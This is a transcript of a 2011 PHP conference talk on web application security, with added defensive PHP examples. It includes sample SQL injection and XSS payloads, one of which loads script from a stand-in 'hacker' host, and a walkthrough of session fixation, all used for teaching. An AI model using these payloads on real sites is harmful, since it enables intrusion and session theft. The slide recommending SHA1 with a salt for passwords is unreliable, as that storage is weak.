Phpnw security-20111009 (uploaded by paul-lemon, category: Technology)
Transcript of Phpnw security-20111009
Paul Lemon PHPNW 11 – Notes from the trenches
Are you feeling secure?
Are you feeling secure – notes from the trenches
Paul Lemon @anthonylime
http://joind.in/3603
Introduction: About me
- I am a web developer and have been for 13 years
- Former sound engineer to the obscure and poor
- Technical Director at MadeByPi
- I love what I do: PHP / Java / Actionscript / Javascript / C#
- Wear a mean hairnet
“The problem of insecure software is perhaps the most important technical challenge of our time.” – OWASP Testing Guide Introduction.
Photo courtesy http://www.flickr.com/photos/katescars/
Introduction: This presentation
- Notes based on personal professional experience
- 20+ third-party tests on our applications
- Development orientated
- Simple code examples – not production code.
Introduction: OWASP
Open Web Application Security Project: the best resource for developers / analysts / testers
https://www.owasp.org/
Introduction: OWASP Top 10
- SQL Injection
- Cross-Site Scripting (XSS)
- Broken Authentication and Session Management
- Insecure Direct Object References
- Cross-Site Request Forgery (CSRF)
- Security Misconfiguration
- Insecure Cryptographic Storage
- Failure to Restrict URL Access
- Insufficient Transport Layer Protection
- Unvalidated Redirects and Forwards
SQL Injection
http://www.flickr.com/photos/andresrueda/2983149263/
Injection
http://xkcd.com/327/
Injection: Sample Code
http://someserver/script.php?id=1;INSERT INTO members ('email','passwd','login_id','full_name') VALUES ('[email protected]','hello','paul','Paul Lemon');
Injection: How is it exploited
- Confidential data can be disclosed
  - The results of the query may not be visible in the HTML
  - Trial and error to iterate data in tables
- Execute long-running queries
- Test for errors in page execution
- Vulnerable to inserts / updates / defacement
Injection: Validation and Parameterised Query
Injection: How to prevent
- Validate all input.
- Use PDO to create parameterised queries, or
- Use an ORM or database library (not your own!)
- Set up your database permissions.
- Don't expose your queries (logging etc.)
- Code review
- Don't be complacent
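The concatenation pattern behind the sample URL earlier, next to the validated, parameterised PDO query this slide recommends, as an added example (my code, not from the slides). It assumes a PDO connection to an in-memory SQLite database with a constructed members table so it runs offline; the function names are mine.

```php
<?php
// Added example, not from the slides: vulnerable string-built query beside
// the validated, parameterised version. Uses SQLite in memory with
// constructed rows; swap the DSN for your real database in an application.
declare(strict_types=1);

function connect(): PDO
{
    $pdo = new PDO('sqlite::memory:', null, null, [
        PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION, // fail loudly, never silently
    ]);
    $pdo->exec('CREATE TABLE members (id INTEGER PRIMARY KEY, email TEXT, full_name TEXT)');
    // Constructed sample data.
    $pdo->exec("INSERT INTO members (id, email, full_name) VALUES (1, 'alice@example.test', 'Alice')");
    return $pdo;
}

// VULNERABLE: the raw request value becomes part of the SQL text, so the
// database parses whatever the client put in place of the number.
function findMemberUnsafe(PDO $pdo, string $rawId): ?array
{
    $row = $pdo->query("SELECT id, full_name FROM members WHERE id = $rawId")->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// SAFE: validate first (cast to the expected type and range), then bind the
// value as a parameter so it can only ever be data, never SQL.
function findMember(PDO $pdo, string $rawId): ?array
{
    $id = filter_var($rawId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return null; // reject, do not try to "clean up" the input
    }
    $stmt = $pdo->prepare('SELECT id, full_name FROM members WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

$pdo = connect();
// Constructed input: no member has id 0, but the tautology makes the WHERE
// clause true for every row, so the unsafe function discloses Alice's record.
$hostile = '0 OR 1=1';

var_dump(findMemberUnsafe($pdo, $hostile)); // Alice's row: the clause became "id = 0 OR 1=1"
var_dump(findMember($pdo, $hostile));       // NULL: rejected by validation, nothing reaches the database
var_dump(findMember($pdo, '1'));            // Alice's row, fetched through a bound parameter
```

With MySQL, also pass PDO::ATTR_EMULATE_PREPARES => false in the options so the driver sends real server-side prepared statements rather than client-side escaping, and give the application's database user only the privileges those queries need, as the "set up your database permissions" point says.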
Injection: A quick note about validation
- Validation is not just for the user's benefit
- Cast to the correct type, e.g. intval / floatval / boolean
- Whitelist input ranges: reasonable minimums and maximums
- Whitelist with a regular expression
- Blacklist with a regular expression
- Validate email / URLs
- Don't rely on your model layer
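The validation points on this slide as small reusable checks, as an added example (my code, not from the slides). Each function returns the typed value on success and null (or a safe default) on failure, so callers cannot accidentally use unvalidated input; the names and the sample inputs are constructed.

```php
<?php
// Added example, not from the slides: whitelist-style validators built on
// PHP's filter extension. Function names and sample values are constructed.
declare(strict_types=1);

// Cast to the correct type and whitelist a range: a page number 1..500.
function validatePage(string $raw): ?int
{
    $n = filter_var($raw, FILTER_VALIDATE_INT,
        ['options' => ['min_range' => 1, 'max_range' => 500]]);
    return $n === false ? null : $n; // "12abc", "-3", "9999" all fail
}

// Whitelist with a regular expression: 3..20 word characters, nothing else.
function validateUsername(string $raw): ?string
{
    return preg_match('/^[A-Za-z0-9_]{3,20}$/', $raw) === 1 ? $raw : null;
}

// Whitelist an enumerated option instead of trusting a free-text value
// (for example a column name that would otherwise be concatenated into SQL).
function validateSort(string $raw): string
{
    $allowed = ['name', 'date', 'price'];
    return in_array($raw, $allowed, true) ? $raw : 'name';
}

function validateEmail(string $raw): ?string
{
    $e = filter_var($raw, FILTER_VALIDATE_EMAIL);
    return $e === false ? null : $e;
}

// URLs: syntactically valid AND restricted to http/https, so a
// "javascript:" value never reaches an href attribute.
function validateUrl(string $raw): ?string
{
    $u = filter_var($raw, FILTER_VALIDATE_URL);
    if ($u === false) {
        return null;
    }
    $scheme = strtolower((string) parse_url($u, PHP_URL_SCHEME));
    return in_array($scheme, ['http', 'https'], true) ? $u : null;
}

// Boolean: "1"/"true"/"on"/"yes" -> true, "0"/"false"/"off"/"no"/"" -> false,
// anything else -> null rather than a silent cast.
function validateBool(string $raw): ?bool
{
    return filter_var($raw, FILTER_VALIDATE_BOOLEAN, FILTER_NULL_ON_FAILURE);
}

// Constructed sample request values.
$input = [
    'page'  => '12abc',
    'user'  => 'paul',
    'sort'  => 'name; DROP TABLE members',
    'email' => 'paul@example.test',
    'link'  => 'javascript:alert(1)',
    'opt'   => 'yes',
];

var_dump(validatePage($input['page']));      // NULL
var_dump(validateUsername($input['user']));  // string(4) "paul"
var_dump(validateSort($input['sort']));      // string(4) "name" (default)
var_dump(validateEmail($input['email']));    // string(17) "paul@example.test"
var_dump(validateUrl($input['link']));       // NULL
var_dump(validateBool($input['opt']));       // bool(true)
```

Note the asymmetry the slide warns about: the validators decide what is allowed (whitelist) and reject everything else; a blacklist regex, where you need one, belongs in addition to these checks, not instead of them.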
XSS
http://www.flickr.com/photos/andresrueda/2983149263/
XSS: Sample XSS
http://someserver/script.php?name=<script>alert();</script>
or
http://bit.ly/lYMcHjkj
http://host/script.php?name=<script src='http://hacker/script.js' />
XSS: Potential Exploits
- Theft of session cookies
- Insertion of content / forms etc.
- Redirection to malicious sites
- Insertion of trojan downloads / keyloggers etc.
XSS: Varieties of XSS
- Persistent: data is stored in the database
- Non-persistent: injected code is present in the URL / request
- DOM-based: JavaScript executed in the page reads the request
XSS – Trust zones: Browser
Trusted: Web application
Not trusted: Browser
- Posted form
- Querystring
- URL
- Cookies
- HTTP headers
XSS – Trust zones: API
Trusted: Web application
Not trusted: API
- Use HTTPS
- Treat as user input
XSS – Trust zones: Database
Trusted: Web application
Not trusted: Database
- Database may have been compromised
- Validation may have failed
- Escape all output
XSS – Trust zones: summary
Trusted: Web application
Not trusted: Browser, API, Database
Your application should be modular too
XSS: Escape all output
- ENT_QUOTES option is important – double and single quotes
- Page encoding is important
- If you need HTML output use HTML Purifier
XSS: Escape all output – context is important
?name=<script>alert("hello");</script>&link=javascript:alert('hello')
XSS: Preventing XSS
- Check your templating engine for XSS protection (options in Symfony 1 / Twig for escaping by default)
- Context is important to the escaping used:
  - Images and hyperlinks
  - JavaScript blocks
  - CSS
- There is no definitive solution for PHP
- https://www.owasp.org/index.php/ESAPI#tab=PHP
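One escaping helper per output context, applied to the sample request from the "context is important" slide, as an added example (my code, not from the slides). It shows why ENT_QUOTES, the page charset and the context all matter: the same value needs different treatment in an HTML body, in an href and inside a script block. The helper names are mine; htmlspecialchars and json_encode are core PHP.

```php
<?php
// Added example, not from the slides: context-aware output escaping for
// the payload ?name=<script>alert("hello");</script>&link=javascript:alert('hello').
declare(strict_types=1);

const CHARSET = 'UTF-8';

// HTML body and attribute context. ENT_QUOTES escapes both " and ' so the
// value cannot break out of a single-quoted attribute; the charset argument
// must match the page encoding or multi-byte tricks can slip through.
function e(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, CHARSET);
}

// href / src context. Escaping alone is not enough: "javascript:..." is
// harmless as text but executes as a link, so whitelist the scheme first
// (relative URLs have no scheme and are allowed).
function eUrl(string $s): string
{
    $scheme = strtolower((string) parse_url($s, PHP_URL_SCHEME));
    if ($scheme !== '' && !in_array($scheme, ['http', 'https'], true)) {
        return '#';
    }
    return e($s);
}

// JavaScript context. json_encode yields a valid JS string literal; the
// HEX flags keep "</script>" and quote characters out of the literal so
// the parser cannot be tricked into closing the script block early.
function eJs(string $s): string
{
    $j = json_encode($s, JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT);
    return $j === false ? '""' : $j;
}

// Constructed request values (the slide's sample payloads).
$name = '<script>alert("hello");</script>';
$link = "javascript:alert('hello')";

// The page encoding is part of the defence: declare it explicitly.
header('Content-Type: text/html; charset=' . CHARSET);
?>
<p>Hello <?= e($name) ?></p>
<a href="<?= eUrl($link) ?>">profile</a>
<script>var visitor = <?= eJs($name) ?>;</script>
```

Rendered, the paragraph shows the literal text &lt;script&gt;..., the link becomes href="#", and the script variable is the string "\u003Cscript\u003Ealert(\u0022hello\u0022);\u003C/script\u003E", which the browser treats as data in all three places. CSS contexts need their own escaping again, which is why the slide says there is no single definitive function.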
XSS: Cookies set as HTTPOnly
- Set the session cookie to use HTTPOnly in php.ini
- Or use the PHP function session_set_cookie_params
Session Exploits
Session Exploits: Overview
- Session fixation
- Man-in-the-middle attacks
Session Exploits: Session Fixation
Allowing the session id to be passed on the querystring:
- A URL is sent via email to the potential victim: "visit this url to the site http://localhost/?sessionid=1234"
- The victim logs in and this is attached to the session id
- The sender uses the original session id and gains access: http://localhost/viewprofile?sessionid=1234
Session Exploits: Session Fixation – How to prevent
- Do not allow the session id to be passed on the querystring
Session Exploits: Session Fixation
Where the attacker has access to the machine:
- The first user notes down the session id on the computer
- A second user logs in and this is attached to the session id
- The first user uses the original session id and gains access
Session Exploits: Session Fixation – How to prevent
- Roll the session id when a user logs in
- You can change the session id more frequently…
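The session hardening the deck asks for, collected in one place, as an added example (my code, not from the slides): the HTTPOnly cookie from the earlier "Cookies set as HTTPOnly" slide, refusing session ids on the querystring, and rolling the id at login. The function names are mine; the ini settings and session_* calls are core PHP (the array form of session_set_cookie_params needs PHP 7.3 or later).

```php
<?php
// Added example, not from the slides: session configuration that rejects
// URL-supplied ids, marks the cookie HttpOnly/Secure and regenerates the id
// on login so a pre-planted id is worthless.
declare(strict_types=1);

// Only ever read the session id from the cookie, never from the URL.
ini_set('session.use_only_cookies', '1');
ini_set('session.use_trans_sid', '0');
// Accept only ids the server itself generated (PHP >= 5.5.2), so an id a
// visitor invented or was handed cannot be "adopted" by the server.
ini_set('session.use_strict_mode', '1');

// Runtime equivalent of session.cookie_httponly / session.cookie_secure in php.ini.
session_set_cookie_params([
    'lifetime' => 0,       // session cookie, discarded when the browser closes
    'path'     => '/',
    'domain'   => '',
    'secure'   => true,    // only sent over HTTPS
    'httponly' => true,    // not readable by document.cookie, so XSS cannot steal it
    'samesite' => 'Lax',
]);
session_start();

// Call this only after the password has been verified.
function loginUser(int $userId): void
{
    // Roll the id at the moment privileges change: whatever id the browser
    // carried before login (from an email link or a shared machine) is gone.
    session_regenerate_id(true); // true = delete the old session data too
    $_SESSION = ['user_id' => $userId, 'auth_time' => time()];
}

function logoutUser(): void
{
    $_SESSION = [];
    $p = session_get_cookie_params();
    // Expire the cookie in the browser, then drop the server-side session.
    setcookie(session_name(), '', time() - 42000,
        $p['path'], $p['domain'], $p['secure'], $p['httponly']);
    session_destroy();
}
```

The same session_regenerate_id call is what "change the session id more frequently" means in practice; calling it on every privilege change (login, role switch) is the important case, calling it on every request is optional and costs a session write each time.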
Session Exploits: Man-in-the-middle attacks
User logs in: username / password sent by HTTP POST to the web application, which returns the session id in a cookie.
Over plain HTTP, anyone on the path can read both the credentials and the cookie ("Ahoy!").
Fix the login: username / password sent by HTTPS POST, with the session id cookie returned over HTTPS.
Session Exploits: Man-in-the-middle attacks
- Login and authentication must always be over HTTPS
- Passwords are personal and confidential
- Users are not disciplined
- (Store your passwords securely: SHA1 / salt)
Session Exploits: Man-in-the-middle attacks
User logs in: username / password by HTTPS POST, session id cookie returned.
User then visits a non-secure page: HTTP GET, and the browser sends the session id cookie in the clear along with the request for the resource.
Session Exploits: Man-in-the-middle attacks
- Authenticated session cookies should be delivered over SSL
- Use the HTTPS-only option on the session cookie
- Use a separate domain if you can, e.g. https://admin.yoursite/
- Use a separate path for your session cookie
Session Exploits: Man-in-the-middle attacks
User logs in: username / password by HTTPS POST, session id cookie returned with the HTTPS-only option.
User visits a non-secure page: HTTP GET; the browser does not send the secure-only session cookie over HTTP, so the resource is downloaded without the session ("Curses!").
Session Exploits: Man-in-the-middle attacks
- Sometimes you cannot limit the session to HTTPS
- Users can log in and see non-secure data in public pages
- There are still secure areas of the site
- Use two cookies
- Or make the user log in again
Session Exploits: Two cookies
User logs in: username / password by HTTPS POST; the web application returns the session id cookie and an extra auth cookie flagged SECURE.
Open zone of the web application: the user visits a non-secure page by HTTP GET; only the session id cookie is sent, and the resource is downloaded.
Secure zone of the web application: HTTPS GET / POST / PUT; both the session id and the extra auth cookie (SECURE) are sent, and the response is served.
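The two-cookie scheme from the diagrams above, as an added example (my code, not from the slides). The ordinary session cookie keeps working over HTTP for the open zone; a second random "extra auth" cookie is flagged Secure, so the browser only ever sends it over HTTPS, and every page in the secure zone insists on it. The cookie name, function names, hashing of the token and the login URL are mine (the login URL is a placeholder); setcookie with an options array needs PHP 7.3 or later.

```php
<?php
// Added example, not from the slides: a Secure-flagged second cookie that
// the secure zone requires in addition to the plain session cookie.
declare(strict_types=1);

const EXTRA_AUTH_COOKIE = 'extra_auth'; // constructed name

// Called once at login, which always happens over HTTPS.
function issueExtraAuth(): void
{
    $token = bin2hex(random_bytes(32)); // 256 bits from the CSPRNG
    // Store only a hash server-side, so a leaked session store does not
    // hand out a usable cookie value.
    $_SESSION['extra_auth_hash'] = hash('sha256', $token);
    setcookie(EXTRA_AUTH_COOKIE, $token, [
        'expires'  => 0,
        'path'     => '/',
        'secure'   => true,     // the browser never sends this over plain HTTP
        'httponly' => true,
        'samesite' => 'Strict',
    ]);
}

// Called at the top of every page in the secure zone.
function requireExtraAuth(): bool
{
    if (empty($_SERVER['HTTPS']) || $_SERVER['HTTPS'] === 'off') {
        return false; // the secure zone must itself be served over HTTPS
    }
    $token    = $_COOKIE[EXTRA_AUTH_COOKIE] ?? '';
    $expected = $_SESSION['extra_auth_hash'] ?? '';
    if ($token === '' || $expected === '') {
        return false;
    }
    // Constant-time comparison of the stored hash against the presented token.
    return hash_equals($expected, hash('sha256', $token));
}

session_start();

if (!requireExtraAuth()) {
    // The session may be perfectly valid for the open zone, but it was never
    // proven over HTTPS in this browser: make the user log in again rather
    // than trust a session cookie that could have travelled in the clear.
    header('Location: https://example.test/login', true, 302); // placeholder URL
    exit;
}
// ... secure-zone page continues here ...
```

Because the open-zone session cookie is the only thing an eavesdropper on HTTP could pick up, and it unlocks nothing in the secure zone without the Secure-only second cookie, the scheme delivers the "make the user log in again" fallback automatically whenever the extra cookie is missing.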
XSRF – Sorry no time
Conclusions
Conclusions: Get someone else to do the work
- Use a framework. I like symfony.
- Use a well-supported platform / CMS
- Check their response to security issues
- If there is no solution, check again (and again)
Conclusions: Recommendations
- Expect there to be faults – test as much as you can.
- Expect there to be attacks – monitor your site
- Stay on top of your versions – PHP / MySQL etc.
- Input validation is critical
- Code for quality / unit tests / regression
- Code review
- Operate with least privilege
- Establish a build and deployment script
- Read OWASP
Conclusions: Resources
- XSS cheatlist: http://ha.ckers.org/xss.html
- OWASP: https://www.owasp.org/index.php/Main_Page
- HTML Purifier: http://htmlpurifier.org/
- Context aware templates: http://googleonlinesecurity.blogspot.com/2009/03/reducing-xss-by-way-of-automatic.html
- MadeByPi: http://www.madebypi.co.uk
Are you feeling secure – notes from the trenches
Paul Lemon @anthonylime – [email protected]
http://joind.in/3603